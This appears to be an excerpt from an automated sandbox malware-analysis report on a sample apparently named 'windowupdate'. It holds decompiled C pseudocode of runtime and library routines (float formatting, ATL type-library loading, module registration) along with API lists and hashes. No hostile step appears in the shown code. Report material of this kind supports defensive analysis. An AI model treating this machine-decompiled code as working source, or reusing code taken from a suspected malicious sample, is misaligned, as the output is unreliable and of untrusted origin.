                      				} else {
                      					_v5 = 0x2d;
                      				}
                      				 *_a16 = _v5;
                      				 *((intOrPtr*)(_a16 + 8)) = _a20;
                      				_t127 =  *(_v12 + 4);
                      				_v36 = E00DBEEF0( *_v12, 0x34, _t127) & 0x000007ff;
                      				_v32 = _t127 & 0x00000000;
                      				if((_v36 | _v32) != 0) {
                      					L7:
                      					_v6 = 0;
                      					goto L8;
                      				} else {
                      					_t100 = _v12;
                      					_v44 =  *_t100;
                      					_v40 =  *(_t100 + 4) & 0x000fffff;
                      					if((_v44 | _v40) != 0) {
                      						goto L7;
                      					}
                      					_v6 = 1;
                      					L8:
                      					_v7 = _v6;
                      					if((_v7 & 0x000000ff) == 0) {
                      						_t84 = E00D96D50(__eflags,  &_a4);
                      						_t144 = _t143 + 4;
                      						_v20 = _t84;
                      						__eflags = _v20;
                      						if(_v20 != 0) {
                      							 *((intOrPtr*)(_a16 + 4)) = 1;
                      						}
                      						_v16 = _v20;
                      						_v16 = _v16 - 1;
                      						__eflags = _v16 - 3;
                      						if(_v16 > 3) {
                      							_t111 = _v12;
                      							_t112 = _v12;
                      							 *_t112 =  *_t111;
                      							 *(_t112 + 4) =  *(_t111 + 4) & 0x7fffffff;
                      							_push(_a24);
                      							_push(_a20);
                      							_push(_a16 + 4);
                      							_t136 = _a12 + 1;
                      							__eflags = _t136;
                      							_push(_t136);
                      							 *((long long*)(_t144 - 8)) = _a4;
                      							E00DAA370(_t103, _t141, _t142);
                      							return E00DAAA80( &_v56);
                      						} else {
                      							switch( *((intOrPtr*)(_v16 * 4 +  &M00DAC4E8))) {
                      								case 0:
                      									E00D84A20(E00D82DE0(_a20, _a24, "1#INF"), _t93, L"strcpy_s(result, result_count, \"1#INF\" )", L"__acrt_fltout", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cfout.cpp", 0x12b, 0);
                      									return E00DAAA80( &_v56);
                      								case 1:
                      									__ecx = _a24;
                      									__edx = _a20;
                      									E00D82DE0(_a20, _a24, "1#QNAN") = E00D84A20(__eax, __eax, L"strcpy_s(result, result_count, \"1#QNAN\")", L"__acrt_fltout", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cfout.cpp", 0x12c, 0);
                      									__ecx =  &_v56;
                      									return E00DAAA80( &_v56);
                      								case 2:
                      									__eax = _a24;
                      									__ecx = _a20;
                      									E00D82DE0(_a20, _a24, "1#SNAN") = E00D84A20(__eax, __eax, L"strcpy_s(result, result_count, \"1#SNAN\")", L"__acrt_fltout", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cfout.cpp", 0x12d, 0);
                      									__ecx =  &_v56;
                      									return E00DAAA80( &_v56);
                      								case 3:
                      									__edx = _a24;
                      									__eax = _a20;
                      									E00D82DE0(_a20, _a24, "1#IND") = E00D84A20(__eax, __eax, L"strcpy_s(result, result_count, \"1#IND\" )", L"__acrt_fltout", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cfout.cpp", 0x12e, 0);
                      									__ecx =  &_v56;
                      									return E00DAAA80( &_v56);
                      							}
                      						}
                      					}
                      					 *((intOrPtr*)(_a16 + 4)) = 0;
                      					E00D84A20(E00D82DE0(_a20, _a24, "0"), _t97, L"strcpy_s(result, result_count, \"0\")", L"__acrt_fltout", L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\cfout.cpp", 0x11e, 0);
                      					return E00DAAA80( &_v56);
                      				}
                      			}

                      APIs
                      • __aligned_msize.LIBCMTD ref: 00DAC33F
                      • __invoke_watson_if_error.LIBCMTD ref: 00DAC348
                      • __aligned_msize.LIBCMTD ref: 00DAC3C2
                      • __invoke_watson_if_error.LIBCMTD ref: 00DAC3CB
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: __aligned_msize__invoke_watson_if_error
                      • String ID: $1#IND$1#INF$1#QNAN$1#SNAN$__acrt_fltout$minkernel\crts\ucrt\src\appcrt\convert\cfout.cpp$strcpy_s(result, result_count, "0")$strcpy_s(result, result_count, "1#IND" )$strcpy_s(result, result_count, "1#INF" )$strcpy_s(result, result_count, "1#QNAN")$strcpy_s(result, result_count, "1#SNAN")
                      • API String ID: 4254006664-1152488507
                      • Opcode ID: 84f553fecd23eda2f47c3d112aa1e9a8ef13cc73891005cfd8a60fbb9f6e7422
                      • Instruction ID: bf0c99a636b0bfe8af7d430b29fcc241d88f71b163110b751a1cbeb1dfbb400b
                      • Opcode Fuzzy Hash: 84f553fecd23eda2f47c3d112aa1e9a8ef13cc73891005cfd8a60fbb9f6e7422
                      • Instruction Fuzzy Hash: D6719B74A00248AFCB04EF94D882FEE7BB5AF49704F148158F905AB282D775AA05CBB5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 88%
                      			E00D3A1D0(void* __ebx, struct HINSTANCE__* _a4, signed int _a8, struct HINSTANCE__* _a12, struct HINSTANCE__* _a16) {
                      				signed int _v8;
                      				unsigned int _v16;
                      				intOrPtr _v24;
                      				signed int _v28;
                      				CHAR* _v32;
                      				char _v40;
                      				char _v320;
                      				signed int _v328;
                      				intOrPtr _v332;
                      				struct HINSTANCE__ _v336;
                      				signed int _v340;
                      				intOrPtr _v344;
                      				struct HINSTANCE__* _v348;
                      				signed int _v352;
                      				signed int _v356;
                      				char _v364;
                      				char _v368;
                      				intOrPtr _v376;
                      				intOrPtr _v380;
                      				intOrPtr _v384;
                      				intOrPtr _v388;
                      				intOrPtr _v392;
                      				intOrPtr _v396;
                      				intOrPtr _v400;
                      				signed int _v404;
                      				struct HINSTANCE__ _v412;
                      				struct HINSTANCE__* _v420;
                      				struct HINSTANCE__* _v424;
                      				intOrPtr _v428;
                      				intOrPtr _v432;
                      				intOrPtr _v436;
                      				struct HINSTANCE__* _v440;
                      				struct HINSTANCE__* _v444;
                      				intOrPtr _v448;
                      				intOrPtr _v452;
                      				intOrPtr _v456;
                      				struct HINSTANCE__* _v460;
                      				struct HINSTANCE__* _v464;
                      				intOrPtr _v468;
                      				intOrPtr _v472;
                      				char _v476;
                      				void* _v484;
                      				void* __edx;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t202;
                      				void* _t204;
                      				intOrPtr _t205;
                      				void* _t207;
                      				long _t211;
                      				struct HINSTANCE__ _t213;
                      				signed int _t217;
                      				void* _t228;
                      				char _t231;
                      				signed int _t239;
                      				signed char _t247;
                      				signed char _t255;
                      				signed int _t263;
                      				intOrPtr _t269;
                      				signed char _t276;
                      				void* _t286;
                      				void* _t287;
                      				struct HINSTANCE__* _t344;
                      				void* _t346;
                      				char _t354;
                      				void* _t375;
                      				void* _t376;
                      				signed int _t378;
                      				void* _t379;
                      				intOrPtr _t380;
                      				intOrPtr _t382;
                      				void* _t384;
                      				void* _t387;
                      
                      				_t287 = __ebx;
                      				_t375 =  &_v476;
                      				memset(_t375, 0xcccccccc, 0x76 << 2);
                      				_t380 = _t379 + 0xc;
                      				_t376 = _t375 + 0x76;
                      				_t202 =  *0xdf600c; // 0x71e60372
                      				_v8 = _t202 ^ _t378;
                      				_v412 = 0;
                      				if(_a12 == 0) {
                      					L2:
                      					_t204 = L00D84930(_t390, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1bcb, 0, "%ls", L"pbstrPath != 0 && ppTypeLib != 0");
                      					_t380 = _t380 + 0x18;
                      					if(_t204 == 1) {
                      						asm("int3");
                      					}
                      					L4:
                      					if(_a12 == 0 || _a16 == 0) {
                      						_t205 = 0x80004003;
                      						goto L64;
                      					} else {
                      						 *_a12 = 0;
                      						 *_a16 = 0;
                      						_v16 = 0;
                      						_v24 = E00D31AB0();
                      						_v28 = 0;
                      						_v32 = 0;
                      						E00D3F2E0( &_v40);
                      						__eflags = _a4;
                      						if(__eflags == 0) {
                      							_t286 = L00D84930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1bd3, 0, "%ls", L"hInstTypeLib != 0");
                      							_t380 = _t380 + 0x18;
                      							__eflags = _t286 - 1;
                      							if(_t286 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						_t377 = _t380;
                      						_t344 = _a4;
                      						_t211 = GetModuleFileNameA(_t344,  &_v320, 0x104);
                      						__eflags = _t380 - _t380;
                      						_v328 = E00DC1520(_t211, _t380 - _t380);
                      						__eflags = _v328;
                      						if(_v328 != 0) {
                      							__eflags = _v328 - 0x104;
                      							if(_v328 != 0x104) {
                      								_v336 = 0;
                      								_t213 = E00DBFED0(_t377,  &_v320);
                      								_t382 = _t380 + 4;
                      								_v336 = _t213;
                      								__eflags = _a8;
                      								if(_a8 == 0) {
                      									L32:
                      									_v32 =  &_v320;
                      									__eflags = _v32;
                      									if(_v32 != 0) {
                      										_v16 = E00D82E00(_v32) + 1;
                      										_t217 = E00D31780( &_v16, _t377, __eflags,  &_v16, _v16, 2);
                      										_t382 = _t382 + 0x10;
                      										__eflags = _t217;
                      										if(_t217 >= 0) {
                      											__eflags = _v16 - 0x400;
                      											if(__eflags > 0) {
                      												L39:
                      												_v456 = E00D3F270(_t287,  &_v40, __eflags, _v16);
                      												L40:
                      												_t300 = _v16 >> 1;
                      												__eflags = _v16 >> 1;
                      												_v444 = E00D31AC0(_v16 >> 1, _t377, _v456, _v32, _t300, _v24);
                      												L41:
                      												_v440 = _v444;
                      												L42:
                      												_t344 = _v440;
                      												_v352 = _t344;
                      												__eflags = _v352;
                      												if(_v352 != 0) {
                      													_t377 = _t382;
                      													__imp__#161(_v352, _a16);
                      													__eflags = _t382 - _t382;
                      													_v356 = E00DC1520(_a16, _t382 - _t382);
                      													__eflags = _v356;
                      													if(_v356 >= 0) {
                      														L60:
                      														__eflags = _v356;
                      														if(_v356 >= 0) {
                      															_t377 = _t382;
                      															__imp__#2(_v352);
                      															__eflags = _t382 - _t382;
                      															 *_a12 = E00DC1520(_t223, _t382 - _t382);
                      															_t344 = _a12;
                      															__eflags = _t344->i;
                      															if(_t344->i == 0) {
                      																_v356 = 0x8007000e;
                      																_t377 = _t382;
                      																_t344 =  *( *( *_a16) + 8);
                      																_t228 = _t344->i( *_a16);
                      																__eflags = _t382 - _t382;
                      																E00DC1520(_t228, _t382 - _t382);
                      																 *_a16 = 0;
                      															}
                      														}
                      														_v404 = _v356;
                      														E00D3F220( &_v40);
                      														_t205 = _v404;
                      														goto L64;
                      													}
                      													_t354 = ".tlb"; // 0x626c742e
                      													_v368 = _t354;
                      													_t231 =  *0xdef704; // 0x0
                      													_v364 = _t231;
                      													_t344 =  &_v320;
                      													__eflags = _v336 - _t344 + 5 - 0x104;
                      													if(__eflags <= 0) {
                      														E00D326C0(_t287, _t376, _t377, __eflags, _v336, 0x10e - _v336 -  &_v320,  &_v368);
                      														_t384 = _t382 + 0xc;
                      														_v32 =  &_v320;
                      														__eflags = _v32;
                      														if(_v32 != 0) {
                      															_v16 = E00D82E00(_v32) + 1;
                      															_t239 = E00D31780( &_v16, _t377, __eflags,  &_v16, _v16, 2);
                      															_t382 = _t384 + 0x10;
                      															__eflags = _t239;
                      															if(_t239 >= 0) {
                      																__eflags = _v16 - 0x400;
                      																if(__eflags > 0) {
                      																	L54:
                      																	_v476 = E00D3F270(_t287,  &_v40, __eflags, _v16);
                      																	L55:
                      																	_t317 = _v16 >> 1;
                      																	__eflags = _v16 >> 1;
                      																	_v464 = E00D31AC0(_v16 >> 1, _t377, _v476, _v32, _t317, _v24);
                      																	L56:
                      																	_v460 = _v464;
                      																	L57:
                      																	_t344 = _v460;
                      																	_v352 = _t344;
                      																	__eflags = _v352;
                      																	if(_v352 != 0) {
                      																		_t377 = _t382;
                      																		__imp__#161(_v352, _a16);
                      																		__eflags = _t382 - _t382;
                      																		_v356 = E00DC1520(_a16, _t382 - _t382);
                      																		goto L60;
                      																	}
                      																	_v400 = 0x8007000e;
                      																	E00D3F220( &_v40);
                      																	_t205 = _v400;
                      																	goto L64;
                      																}
                      																_t247 = E00D31900(__eflags, _v16);
                      																_t382 = _t382 + 4;
                      																__eflags = _t247 & 0x000000ff;
                      																if(__eflags == 0) {
                      																	goto L54;
                      																}
                      																_v468 = _v16 + 0x24;
                      																E00DBF1D0(_v468);
                      																_v472 = _t382;
                      																E00DC13A0(_v472, _v468,  &_v412);
                      																_v472 = _v472 + 0x20;
                      																_v476 = _v472;
                      																goto L55;
                      															}
                      															_v464 = 0;
                      															goto L56;
                      														}
                      														_v460 = 0;
                      														goto L57;
                      													}
                      													_v396 = 0x80004005;
                      													E00D3F220( &_v40);
                      													_t205 = _v396;
                      													goto L64;
                      												}
                      												_v392 = 0x8007000e;
                      												E00D3F220( &_v40);
                      												_t205 = _v392;
                      												goto L64;
                      											}
                      											_t255 = E00D31900(__eflags, _v16);
                      											_t382 = _t382 + 4;
                      											__eflags = _t255 & 0x000000ff;
                      											if(__eflags == 0) {
                      												goto L39;
                      											}
                      											_v448 = _v16 + 0x24;
                      											E00DBF1D0(_v448);
                      											_v452 = _t382;
                      											E00DC13A0(_v452, _v448,  &_v412);
                      											_v452 = _v452 + 0x20;
                      											_v456 = _v452;
                      											goto L40;
                      										}
                      										_v444 = 0;
                      										goto L41;
                      									}
                      									_v440 = 0;
                      									goto L42;
                      								}
                      								_v28 = _a8;
                      								__eflags = _v28;
                      								if(__eflags != 0) {
                      									_v16 = E00D85A70(_v28) + 1;
                      									_t263 = E00D31780( &_v16, _t377, __eflags,  &_v16, _v16, 2);
                      									_t382 = _t382 + 0x10;
                      									__eflags = _t263;
                      									if(_t263 >= 0) {
                      										__eflags = _v16 - 0x400;
                      										if(__eflags > 0) {
                      											L22:
                      											_v436 = E00D3F270(_t287,  &_v40, __eflags, _v16);
                      											L23:
                      											_v424 = E00D31BB0(_v16, _t377, _v436, _v28, _v16, _v24);
                      											L24:
                      											_v420 = _v424;
                      											L25:
                      											_t344 = _v420;
                      											_v340 = _t344;
                      											__eflags = _v340;
                      											if(_v340 != 0) {
                      												_t269 = E00D82E00(_v340);
                      												_t387 = _t382 + 4;
                      												_v344 = _t269;
                      												_v348 = _v328 + _v344;
                      												_t344 = _v348;
                      												__eflags = _t344 - _v328;
                      												if(_t344 < _v328) {
                      													L30:
                      													_v388 = 0x80004005;
                      													E00D3F220( &_v40);
                      													_t205 = _v388;
                      													goto L64;
                      												}
                      												__eflags = _v348 - _v344;
                      												if(_v348 < _v344) {
                      													goto L30;
                      												}
                      												__eflags = _v348 - 0x10e;
                      												if(_v348 < 0x10e) {
                      													__eflags = 0x10e;
                      													E00D326C0(_t287, _t376, _t377, 0x10e, _t378 + _v328 - 0x13c, 0x10e - _v328, _v340);
                      													_t382 = _t387 + 0xc;
                      													goto L32;
                      												}
                      												goto L30;
                      											}
                      											_v384 = 0x8007000e;
                      											E00D3F220( &_v40);
                      											_t205 = _v384;
                      											goto L64;
                      										}
                      										_t276 = E00D31900(__eflags, _v16);
                      										_t382 = _t382 + 4;
                      										__eflags = _t276 & 0x000000ff;
                      										if(__eflags == 0) {
                      											goto L22;
                      										}
                      										_v428 = _v16 + 0x24;
                      										E00DBF1D0(_v428);
                      										_v432 = _t382;
                      										E00DC13A0(_v432, _v428,  &_v412);
                      										_v432 = _v432 + 0x20;
                      										_v436 = _v432;
                      										goto L23;
                      									}
                      									_v424 = 0;
                      									goto L24;
                      								}
                      								_v420 = 0;
                      								goto L25;
                      							}
                      							_v380 = E00D31710( &_v320, 0x7a);
                      							E00D3F220( &_v40);
                      							_t205 = _v380;
                      							goto L64;
                      						} else {
                      							_v332 = E00D32DC0( &_v320, _t377);
                      							_v376 = _v332;
                      							E00D3F220( &_v40);
                      							_t205 = _v376;
                      							L64:
                      							E00DC13E0(_t287, _t378, 0xd3a8d8, _v412);
                      							_t207 = _t205;
                      							_t346 = _t344;
                      							return E00D47280(_t207, _t287, _v8 ^ _t378, _t346, _t376, _t377);
                      						}
                      					}
                      				}
                      				_t390 = _a16;
                      				if(_a16 != 0) {
                      					goto L4;
                      				}
                      				goto L2;
                      			}


                      APIs
                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?), ref: 00D3A2BE
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: FileModuleName
                      • String ID: $ $ $%ls$.tlb$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$hInstTypeLib != 0$pbstrPath != 0 && ppTypeLib != 0
                      • API String ID: 514040917-3249255110
                      • Opcode ID: 63e4d0b2e911d12cb123e744b1bbe382ae81ba93626a0c1e21e4db5fd1c9c7e1
                      • Instruction ID: 15ca5fc6f306eea48e31c89159b542d0dd411610ac8f1aa42d5d22722124f054
                      • Opcode Fuzzy Hash: 63e4d0b2e911d12cb123e744b1bbe382ae81ba93626a0c1e21e4db5fd1c9c7e1
                      • Instruction Fuzzy Hash: 6F1216B5E00229DFDB24DF98DC85BEEB3B4EB48300F148199E549A7241DB749E84CFA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D52940(void* __ebx, void* __edi, void* __esi, signed int _a4, intOrPtr _a8) {
                      				intOrPtr _v8;
                      				char _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _v44;
                      				intOrPtr _v48;
                      				intOrPtr _v52;
                      				intOrPtr _v56;
                      				intOrPtr _v60;
                      				intOrPtr _v64;
                      				char _v68;
                      				char _v76;
                      				intOrPtr _v80;
                      				char _v84;
                      				char _v92;
                      				char _v100;
                      				char _v108;
                      				char _v116;
                      				char _v124;
                      				char _v132;
                      				char _v140;
                      				char _v148;
                      				char _v156;
                      				char _v164;
                      				char _v172;
                      				char _v180;
                      				char _v188;
                      				char _v196;
                      				char _v204;
                      				char _v212;
                      				char _v220;
                      				char* _t80;
                      				intOrPtr _t109;
                      				intOrPtr _t119;
                      				char _t123;
                      				void* _t131;
                      				intOrPtr _t169;
                      				char* _t177;
                      				void* _t181;
                      				void* _t182;
                      				void* _t183;
                      
                      				_t182 = __esi;
                      				_t181 = __edi;
                      				_t131 = __ebx;
                      				_t80 =  *0xf20640; // 0x0
                      				if( *_t80 == 0) {
                      					if(E00D5A560(_a8) != 0) {
                      						_v56 = E00D4F270( &_v204, 0x5b);
                      						_v60 = E00D4FC30(_v56,  &_v212, 1);
                      						E00D52CD0(_a4, E00D4FBB0(_v60,  &_v220, 0x5d));
                      						return _a4;
                      					}
                      					_v84 = E00D50060(")[", 2);
                      					_v80 = _t169;
                      					_v44 = E00D4FAD0( &_v172, 0x28, _a8);
                      					_v48 = E00D4FB30(_v44,  &_v180,  &_v84);
                      					_v52 = E00D4FC30(_v48,  &_v188, 1);
                      					E00D52CD0(_a4, E00D4FBB0(_v52,  &_v196, 0x5d));
                      					return _a4;
                      				}
                      				_v8 = E00D55D80();
                      				if(_v8 < 0) {
                      					_v8 = 0;
                      				}
                      				if(_v8 != 0) {
                      					E00D4F3F0( &_v16);
                      					if(E00D5A520(_a8) != 0) {
                      						_t123 = E00D50060(0xdc8da8, 2);
                      						_t183 = _t183 + 8;
                      						_v68 = _t123;
                      						_v64 = _t169;
                      						E00D4FCA0( &_v16,  &_v68);
                      					}
                      					while(E00D5A6C0( &_v16) != 0) {
                      						_v28 = _v8;
                      						_v8 = _v8 - 1;
                      						if(_v28 == 0) {
                      							break;
                      						}
                      						_t177 =  *0xf20640; // 0x0
                      						if( *_t177 == 0) {
                      							break;
                      						}
                      						_t119 = E00D4FAD0( &_v124, 0x5b, E00D54900(_t131, _t181, _t182,  &_v116, 0));
                      						_t183 = _t183 + 0x14;
                      						_v32 = _t119;
                      						E00D4FD40( &_v16, E00D4FBB0(_v32,  &_v132, 0x5d));
                      					}
                      					if(E00D5A560(_a8) == 0) {
                      						if(E00D5A520(_a8) == 0) {
                      							_t109 = E00D4FAD0( &_v148, 0x28, _a8);
                      							_t183 = _t183 + 0xc;
                      							_v36 = _t109;
                      							_v40 = E00D4FBB0(_v36,  &_v156, 0x29);
                      							E00D4F820( &_v16, E00D4FB70(_v40,  &_v164,  &_v16));
                      						} else {
                      							E00D4F820( &_v16, E00D4FB70(_a8,  &_v140,  &_v16));
                      						}
                      					}
                      					E00D56AB0(_t131, _t181, _t182,  &_v76,  &_v16);
                      					E00D5AA80( &_v76);
                      					E00D4F240(_a4,  &_v76);
                      					return _a4;
                      				}
                      				_v20 = E00D4F270( &_v92, 0x5b);
                      				_v24 = E00D4FC30(_v20,  &_v100, 1);
                      				E00D52CD0(_a4, E00D4FBB0(_v24,  &_v108, 0x5d));
                      				return _a4;
                      			}

                      APIs
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Name::operator+$EmptyName::isoperator+
                      • String ID:
                      • API String ID: 2054230242-0
                      • Opcode ID: b0144724780e5397e9c46eafe66d9a7dc958038cc325c43501f7275b04c81fbe
                      • Instruction ID: 78eebbea5f91067c84147bebe929876d449d4080c0bf002265fa466179c2d021
                      • Opcode Fuzzy Hash: b0144724780e5397e9c46eafe66d9a7dc958038cc325c43501f7275b04c81fbe
                      • Instruction Fuzzy Hash: 6E81FA71900208ABDF14EFA4DC92FFEB775EF45301F548169ED09AA191EB306A49CB71
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 78%
                      			E00D37640(void* __ebx, void* __ecx) {
                      				signed int _v8;
                      				void* _v12;
                      				CHAR* _v20;
                      				intOrPtr _v28;
                      				signed int _v32;
                      				CHAR* _v36;
                      				char _v44;
                      				char _v312;
                      				struct HINSTANCE__* _v320;
                      				intOrPtr _v324;
                      				signed int _v328;
                      				char _v594;
                      				char _v596;
                      				void* _v608;
                      				signed int _v616;
                      				struct _SHFILEINFOA _v972;
                      				intOrPtr _v980;
                      				intOrPtr _v984;
                      				intOrPtr _v988;
                      				signed int _v992;
                      				signed int _v996;
                      				signed int _v1000;
                      				signed int _v1004;
                      				CHAR* _v1012;
                      				CHAR* _v1020;
                      				CHAR* _v1024;
                      				char* _v1028;
                      				intOrPtr _v1032;
                      				char _v1036;
                      				void* _v1044;
                      				void* __edx;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t131;
                      				void* _t145;
                      				void* _t149;
                      				signed int _t156;
                      				void* _t161;
                      				void* _t164;
                      				long _t168;
                      				signed int _t169;
                      				void* _t172;
                      				intOrPtr _t176;
                      				void* _t178;
                      				void* _t181;
                      				void* _t184;
                      				signed char _t188;
                      				struct HINSTANCE__* _t196;
                      				void* _t197;
                      				void* _t200;
                      				void* _t206;
                      				intOrPtr* _t210;
                      				short _t247;
                      				signed int _t251;
                      				void* _t260;
                      				intOrPtr* _t261;
                      				void* _t267;
                      				void* _t268;
                      				signed int _t276;
                      				void* _t277;
                      				intOrPtr _t278;
                      
                      				_t206 = __ebx;
                      				_push(__ecx);
                      				_t267 =  &_v1036;
                      				memset(_t267, 0xcccccccc, 0x102 << 2);
                      				_t278 = _t277 + 0xc;
                      				_t268 = _t267 + 0x102;
                      				_pop(_t210);
                      				_t131 =  *0xdf600c; // 0x71e60372
                      				_v8 = _t131 ^ _t276;
                      				_v12 = _t210;
                      				_v1012 = 0;
                      				_v20 = 0;
                      				_v28 = E00D31AB0();
                      				_v32 = 0;
                      				_v36 = 0;
                      				E00D3F2E0( &_v44);
                      				_v320 = E00D32B10(0xf20220);
                      				_t269 = _t278;
                      				_t213 = _v320;
                      				_v324 = E00DC1520(GetModuleFileNameA(_v320,  &_v312, 0x104), _t278 - _t278);
                      				if(_v324 != 0) {
                      					__eflags = _v324 - 0x104;
                      					if(_v324 != 0x104) {
                      						__eflags = _v320;
                      						if(_v320 == 0) {
                      							L6:
                      							_t247 = "\""; // 0x22
                      							_v596 = _t247;
                      							E00D4AF80(_t268,  &_v594, 0, 0x104);
                      							E00D327B0(_t206, _t268, _t269, __eflags,  &_v596, 0x106,  &_v312);
                      							E00D327B0(_t206, _t268, _t269, __eflags,  &_v596, 0x106, "\"");
                      							_t278 = _t278 + 0x24;
                      							_t145 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x14))))(_v12, "Module",  &_v596);
                      							__eflags = _t278 - _t278;
                      							_v328 = E00DC1520(_t145, _t278 - _t278);
                      							L8:
                      							__eflags = _v328;
                      							if(_v328 >= 0) {
                      								_t251 =  *_v12;
                      								_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t251 + 0x14))))(_v12, "Module_Raw",  &_v312);
                      								__eflags = _t278 - _t278;
                      								_v328 = E00DC1520(_t149, _t278 - _t278);
                      								__eflags = _v328;
                      								if(_v328 >= 0) {
                      									_t272 = _t278;
                      									__imp__StringFromCLSID(0xf23678,  &_v608);
                      									__eflags = _t278 - _t278;
                      									_v328 = E00DC1520( &_v608, _t278 - _t278);
                      									__eflags = _v328;
                      									if(_v328 >= 0) {
                      										_v32 = _v608;
                      										__eflags = _v32;
                      										if(__eflags != 0) {
                      											_v20 = E00D85A70(_v32) + 1;
                      											_t156 = E00D31780( &_v20, _t272, __eflags,  &_v20, _v20, 2);
                      											_t278 = _t278 + 0x10;
                      											__eflags = _t156;
                      											if(_t156 >= 0) {
                      												__eflags = _v20 - 0x400;
                      												if(__eflags > 0) {
                      													L21:
                      													_v1036 = E00D3F270(_t206,  &_v44, __eflags, _v20);
                      													L22:
                      													_v1024 = E00D31BB0(_v20, _t272, _v1036, _v32, _v20, _v28);
                      													L23:
                      													_v1020 = _v1024;
                      													L24:
                      													_v616 = _v1020;
                      													do {
                      														__eflags = _v616;
                      														if(__eflags == 0) {
                      															_t161 = L00D84930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0xcd, 0, "%ls", L"pszModuleGUID != 0");
                      															_t278 = _t278 + 0x18;
                      															__eflags = _t161 - 1;
                      															if(_t161 == 1) {
                      																asm("int3");
                      															}
                      														}
                      														__eflags = 0;
                      													} while (0 != 0);
                      													_t164 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x14))))(_v12, "MODULEGUID", _v616);
                      													__eflags = _t278 - _t278;
                      													_v328 = E00DC1520(_t164, _t278 - _t278);
                      													_t274 = _t278;
                      													__imp__CoTaskMemFree(_v608);
                      													__eflags = _t278 - _t278;
                      													E00DC1520(_t165, _t278 - _t278);
                      													__eflags = _v328;
                      													if(_v328 >= 0) {
                      														_t168 = SHGetFileInfoA( &_v312, 0,  &_v972, 0x160, 0x2000);
                      														__eflags = _t278 - _t278;
